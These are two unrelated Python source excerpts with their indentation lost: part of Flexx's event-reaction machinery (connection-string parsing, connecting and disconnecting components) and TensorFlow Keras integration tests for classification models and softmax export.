* With two stars, the connection is made *recursively*, e.g. "children**"
connects to "children" and the children's children, etc.
* Stripped of '*', each part must be a valid identifier (ASCII).
* The total string optionally has a label suffix separated by a colon. The
label itself may consist of any characters.
* The string can have a "!" at the very start to suppress warnings for
connections to event types that Flexx is not aware of at initialization
time (i.e. not corresponding to a property or emitter).
An extreme example could be ``"!foo.children**.text:mylabel"``, which connects
to the "text" event of the children (and their children, and their children's
children etc.) of the ``foo`` attribute. The "!" is common in cases like
this to suppress warnings if not all children have a ``text`` event/property.
"""
if (not connection_strings):
raise TypeError('reaction() needs one or more arguments.')
# Validate mode parameter
mode = mode or 'normal' # i.e. allow None
if not isinstance(mode, str):
raise TypeError('Reaction mode must be a string.')
mode = mode.lower()
if mode not in ('normal', 'greedy', 'auto'):
raise TypeError('Reaction mode must "normal", "greedy" or "auto".')
# Extract function if we can
func = None
if len(connection_strings) == 1 and callable(connection_strings[0]):
func = connection_strings[0]
connection_strings = []
for s in connection_strings:
if not (isinstance(s, str) and len(s) > 0):
raise TypeError('Connection string must be nonempty strings.')
def _connect(func):
if not callable(func):
raise TypeError('reaction() decorator requires a callable.')
if not looks_like_method(func):
raise TypeError('reaction() decorator requires a method '
'(first arg must be self).')
return ReactionDescriptor(func, mode, connection_strings)
if func is not None:
return _connect(func)
else:
return _connect
class ReactionDescriptor(BaseDescriptor):
""" Class descriptor for reactions.
"""
def __init__(self, func, mode, connection_strings, ob=None):
self._name = func.__name__
self._func = func
self._mode = mode
if len(connection_strings) == 0:
self._mode = 'auto'
self._connection_strings = connection_strings
self._ob = None if ob is None else weakref.ref(ob)
self.__doc__ = self._format_doc('reaction', self._name, func.__doc__)
def __get__(self, instance, owner):
if instance is None:
return self
private_name = '_' + self._name + '_reaction'
try:
reaction = getattr(instance, private_name)
except AttributeError:
reaction = Reaction(instance if self._ob is None else self._ob(),
(self._func, instance),
self._mode,
self._connection_strings)
setattr(instance, private_name, reaction)
# Make the reaction use *our* func one time. In most situations
# this is the same function that the reaction has, but not when
# using super(); i.e. this allows a reaction to call the same
# reaction of its super class.
reaction._use_once(self._func)
return reaction
@property
def local_connection_strings(self):
""" List of connection strings that are local to the object.
"""
# This is used in e.g. flexx.app
return [s for s in self._connection_strings if '.' not in s]
class Reaction:
""" Reaction objects are wrappers around Component methods. They connect
to one or more events. This class should not be instantiated directly;
use ``event.reaction()`` or ``Component.reaction()`` instead.
"""
_count = 0
def __init__(self, ob, func, mode, connection_strings):
Reaction._count += 1
self._id = 'r%i' % Reaction._count # to ensure a consistent event order
# Store objects using a weakref.
# - ob1 is the Component object of which the connect() method was called
# to create the reaction. Connection strings are relative to this object.
# - ob2 is the object to be passed to func (if it is a method). Is often
# the same as ob1, but not per see. Can be None.
self._ob1 = weakref.ref(ob)
# Get unbounded version of bound methods.
self._ob2 = None # if None, its regarded a regular function
if isinstance(func, tuple):
self._ob2 = weakref.ref(func[1])
func = func[0]
if getattr(func, '__self__', None) is not None: # builtin funcs have __self__
if getattr(func, '__func__', None) is not None:
self._ob2 = weakref.ref(func.__self__)
func = func.__func__
# Store func, name, and docstring (e.g. for sphinx docs)
assert callable(func)
assert mode in ('normal', 'greedy', 'auto')
self._func = func
self._func_once = func
self._mode = mode
self._name = func.__name__
self.__doc__ = BaseDescriptor._format_doc('reaction', self._name, func.__doc__)
self._init(connection_strings)
def _init(self, connection_strings):
""" Init of this reaction that is compatible with PScript.
"""
ichars = '0123456789_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
# Init explicit connections: (connection-object, type) tuples
self._connections = []
# Init implicit connections: (component, type) tuples
self._implicit_connections = []
# Notes on connection strings:
# * The string can have a "!" at the start to suppress warnings for
# connections to unknown event types.
# * The string can have a label suffix separated by a colon. The
# label may consist of any chars.
# * Connection strings consist of parts separated by dots.
# * Each part can end with one star ('*'), indicating that connections
# should be made for each item in the list, or two stars, indicating
# that connections should be made *recursively* for each item in the
# list (a.k.a. a deep connector).
# * Stripped of '*', each part must be a valid identifier.
# * An extreme example: "!foo.bar*.spam.eggs**:meh"
for ic in range(len(connection_strings)):
fullname = connection_strings[ic]
# Separate label and exclamation mark from the string path
force = fullname.startswith('!')
s, _, label = fullname.lstrip('!').partition(':')
s0 = s
# Backwards compat: "foo.*.bar* becomes "foo*.bar"
if '.*.' in s + '.':
s = s.replace('.*', '*')
console.warn('Connection string syntax "foo.*.bar" is deprecated, '
'use "%s" instead of "%s":.' % (s, s0))
# Help put exclamation at the start
if '!' in s:
s = s.replace('!', '')
force = True
console.warn('Exclamation marks in connection strings must come at '
'the very start, use "!%s" instead of "%s".' % (s, s0))
# Check that all parts are identifiers
parts = s.split('.')
for ipart in range(len(parts)):
part = parts[ipart].rstrip('*')
is_identifier = len(part) > 0
for i in range(len(part)):
is_identifier = is_identifier and (part[i] in ichars)
if is_identifier is False:
raise ValueError('Connection string %r contains '
'non-identifier part %r' % (s, part))
# Init connection
d = Dict() # don't do Dict(foo=x) bc PScript only supports that for dict
self._connections.append(d)
d.fullname = fullname # original, used in logs, so is searchable
d.parts = parts
d.type = parts[-1].rstrip('*') + ':' + (label or self._name)
d.force = force
d.objects = []
# Connect
for ic in range(len(self._connections)):
self.reconnect(ic)
def __repr__(self):
c = '+'.join([str(len(c.objects)) for c in self._connections])
cname = self.__class__.__name__
t = '<%s %r (%s) with %s connections at 0x%x>'
return t % (cname, self._name, self._mode, c, id(self))
def get_mode(self):
""" Get the mode for this reaction:
* 'normal': events are handled in the order that they were emitted.
Consequently, there can be multiple calls per event loop iteration
if other reactions were triggered as well.
* 'greedy': this reaction receives all its events (since the last event
loop iteration) in a single call (even if this breaks the order of
events with respect to other reactions). Use this when multiple related
events must be handled simultenously (e.g. when syncing properties).
* 'auto': this reaction tracks what properties it uses, and is
automatically triggered when any of these properties changes. Like
'greedy' there is at most one call per event loop iteration.
Reactions with zero connection strings always have mode 'auto'.
The 'normal' mode generally offers the most consistent behaviour.
The 'greedy' mode allows the event system to make some optimizations.
Combined with the fact that there is at most one call per event loop
iteration, this can provide higher performance where it matters.
Reactions with mode 'auto' can be a convenient way to connect things
up. Although it allows the event system to make the same optimizations
as 'greedy', it also needs to reconnect the reaction after each time
it is called, which can degregade performance especially if many
properties are accessed by the reaction.
"""
return self._mode
def get_name(self):
""" Get the name of this reaction, usually corresponding to the name
of the function that this reaction wraps.
"""
return self._name
def get_connection_info(self):
""" Get a list of tuples (name, connection_names), where
connection_names is a list of type names (including label) for
the made connections.
"""
return [(c.fullname, [u[1] for u in c.objects])
for c in self._connections]
## Calling / handling
def _use_once(self, func):
self._func_once = func
def __call__(self, *events):
""" Call the reaction function.
"""
func = self._func_once
self._func_once = self._func
if self._ob2 is not None:
if self._ob2() is not None:
res = func(self._ob2(), *events)
else: # pragma: no cover
# We detected that the object that wants the events no longer exist
self.dispose()
return
else:
res = func(*events)
return res
## Connecting
def dispose(self):
""" Disconnect all connections so that there are no more references
to components.
"""
if len(self._connections) == 0 and len(self._implicit_connections) == 0:
return
if not this_is_js():
self._ob1 = lambda: None
logger.debug('Disposing reaction %r ' % self)
while len(self._implicit_connections):
ob, type = self._implicit_connections.pop(0)
ob.disconnect(type, self)
for ic in range(len(self._connections)):
connection = self._connections[ic]
while len(connection.objects) > 0:
ob, type = connection.objects.pop(0)
ob.disconnect(type, self)
self._connections = []
def _update_implicit_connections(self, connections):
""" Update the list of implicit (i.e. automatic) connections.
Used by the loop.
"""
# Init - each connection is a (component, type) tuple
old_conns = self._implicit_connections
new_conns = connections
self._implicit_connections = new_conns
# Reconnect in a smart way
self._connect_and_disconnect(old_conns, new_conns)
def _clear_component_refs(self, ob):
""" Clear all references to the given Component instance. This is
called from a Component' dispose() method. This reaction remains
working, but wont receive events from that object anymore.
"""
for i in range(len(self._implicit_connections)-1, -1, -1):
if self._implicit_connections[i][0] is ob:
self._implicit_connections.pop(i)
for ic in range(len(self._connections)):
connection = self._connections[ic]
for i in range(len(connection.objects)-1, -1, -1):
if connection.objects[i][0] is ob:
connection.objects.pop(i)
def reconnect(self, index):
""" (re)connect the index'th connection.
"""
connection = self._connections[index]
# Prepare disconnecting
old_objects = connection.objects # (ob, type) tuples
connection.objects = []
# Obtain root object and setup connections
ob = self._ob1()
if ob is not None:
self._seek_event_object(index, connection.parts, ob)
new_objects = connection.objects
# Verify
if len(new_objects) == 0:
raise RuntimeError('Could not connect to %r' % connection.fullname)
# Reconnect in a smart way
self._connect_and_disconnect(old_objects, new_objects, connection.force)
def _connect_and_disconnect(self, old_objects, new_objects, force=False):
""" Update connections by disconnecting old and connecting new,
but try to keep connections that do not change.
"""
# Keep track of what connections we skip, i.e. which we should not remove.
# Otherwise we may remove duplicate objects. See issue #460.
should_stay = {}
# Skip common objects from the start
i1 = 0
while (i1 < len(new_objects) and i1 < len(old_objects) and
new_objects[i1][0] is old_objects[i1][0] and
new_objects[i1][1] == old_objects[i1][1]):
should_stay[new_objects[i1][0].id + '-' + new_objects[i1][1]] = True
i1 += 1
# Skip common objects from the end
i2, i3 = len(new_objects) - 1, len(old_objects) - 1
while (i2 >= i1 and i3 >= i1 and
new_objects[i2][0] is old_objects[i3][0] and
new_objects[i2][1] == old_objects[i3][1]):
should_stay[new_objects[i2][0].id + '-' + new_objects[i2][1]] = True
i2 -= 1
i3 -= 1
# Disconnect remaining old
for i in range(i1, i3+1):
ob, type = old_objects[i]
if should_stay.get(ob.id + '-' + type, False) is False:
ob.disconnect(type, self)
# Connect remaining new
for i in range(i1, i2+1):
ob, type = new_objects[i]
ob._register_reaction(type, self, force)
def _seek_event_object(self, index, path, ob):
""" Seek an event object based on the name (PScript compatible).
The path is a list: the path to the event, the last element being the
event type.
"""
connection = self._connections[index]
# Should we make connection or stop?
if ob is None or len(path) == 0:
return # We cannot seek further
if len(path) == 1:
# Path only consists of event type now: make connection
# connection.type consists of event type name (no stars) plus a label
if hasattr(ob, '_IS_COMPONENT'):
connection.objects.append((ob, connection.type))
# Reached end or continue?
if not path[0].endswith('**'):
return
# Resolve name
obname_full, path = path[0], path[1:]
obname = obname_full.rstrip('*')
selector = obname_full[len(obname):]
# Internally, 3-star notation is used for optional selectors
if selector == '***':
self._seek_event_object(index, path, ob)
# Select object
if hasattr(ob, '_IS_COMPONENT') and obname in ob.__properties__:
name_label = obname + ':reconnect_' + str(index)
connection.objects.append((ob, name_label))
new_ob = getattr(ob, obname, None)
else:
new_ob = getattr(ob, obname, None)
# Look inside?
if len(selector) and selector in '***' and isinstance(new_ob, (tuple, list)):
if len(selector) > 1:
path = [obname + '***'] + path # recurse (avoid insert for space)
for isub in range(len(new_ob)):
self._seek_event_object(index, path, new_ob[isub])
return
elif selector == '*': # "**" is recursive, so allow more
t = "Invalid connection {name_full} because {name} is not a tuple/list."
raise RuntimeError(t.replace("{name_full}", obname_full)
.replace("{name}", obname))
else:
return self._seek_event_object(index, path, new_ob)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.python import keras
from tensorflow.python.framework import dtypes
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import nn_ops as nn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.platform import test
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class VectorClassificationIntegrationTest(keras_parameterized.TestCase):
def test_vector_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_model_from_layers(
[keras.layers.Dense(16, activation='relu'),
keras.layers.Dropout(0.1),
keras.layers.Dense(y_train.shape[-1], activation='softmax')],
input_shape=x_train.shape[1:])
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['acc'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
def test_vector_classification_shared_model(self):
# Test that Sequential models that feature internal updates
# and internal losses can be shared.
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
base_model = testing_utils.get_model_from_layers(
[keras.layers.Dense(16,
activation='relu',
kernel_regularizer=keras.regularizers.l2(1e-5),
bias_regularizer=keras.regularizers.l2(1e-5)),
keras.layers.BatchNormalization()],
input_shape=x_train.shape[1:])
x = keras.layers.Input(x_train.shape[1:])
y = base_model(x)
y = keras.layers.Dense(y_train.shape[-1], activation='softmax')(y)
model = keras.models.Model(x, y)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['acc'],
run_eagerly=testing_utils.should_run_eagerly())
if not testing_utils.should_run_eagerly():
self.assertEqual(len(model.losses), 2)
self.assertEqual(len(model.updates), 2)
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
# See b/122473407
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TimeseriesClassificationIntegrationTest(keras_parameterized.TestCase):
@keras_parameterized.run_with_all_model_types
def test_timeseries_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(4, 10),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
layers = [
keras.layers.LSTM(5, return_sequences=True),
keras.layers.GRU(y_train.shape[-1], activation='softmax')
]
model = testing_utils.get_model_from_layers(
layers, input_shape=x_train.shape[1:])
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['acc'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=15, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
def test_timeseries_classification_sequential_tf_rnn(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(4, 10),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(keras.layers.RNN(rnn_cell.LSTMCell(5), return_sequences=True,
input_shape=x_train.shape[1:]))
model.add(keras.layers.RNN(rnn_cell.GRUCell(y_train.shape[-1],
activation='softmax',
dtype=dtypes.float32)))
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['acc'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=15, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class ImageClassificationIntegrationTest(keras_parameterized.TestCase):
def test_image_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10, 10, 3),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
layers = [
keras.layers.Conv2D(4, 3, padding='same', activation='relu'),
keras.layers.Conv2D(8, 3, padding='same'),
keras.layers.BatchNormalization(),
keras.layers.Conv2D(8, 3, padding='same'),
keras.layers.Flatten(),
keras.layers.Dense(y_train.shape[-1], activation='softmax')
]
model = testing_utils.get_model_from_layers(
layers, input_shape=x_train.shape[1:])
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['acc'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
@keras_parameterized.run_all_keras_modes
class ActivationV2IntegrationTest(keras_parameterized.TestCase):
"""Tests activation function V2 in model exporting and loading.
This test is to verify in TF 2.x, when 'tf.nn.softmax' is used as an
activition function, its model exporting and loading work as expected.
Check b/123041942 for details.
"""
def test_serialization_v2_model(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = keras.Sequential([
keras.layers.Flatten(input_shape=x_train.shape[1:]),
keras.layers.Dense(10, activation=nn.relu),
# To mimic 'tf.nn.softmax' used in TF 2.x.
keras.layers.Dense(y_train.shape[-1], activation=nn.softmax_v2),
])
# Check if 'softmax' is in model.get_config().
last_layer_activation = model.get_layer(index=2).get_config()['activation']
self.assertEqual(last_layer_activation, 'softmax')
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
model.fit(x_train, y_train, epochs=2, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
output_path = os.path.join(self.get_temp_dir(), 'tf_keras_saved_model')
keras.saving.saved_model.export_saved_model(model, output_path)
loaded_model = keras.saving.saved_model.load_from_saved_model(output_path)
self.assertEqual(model.summary(), loaded_model.summary())
if __name__ == '__main__':
test.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.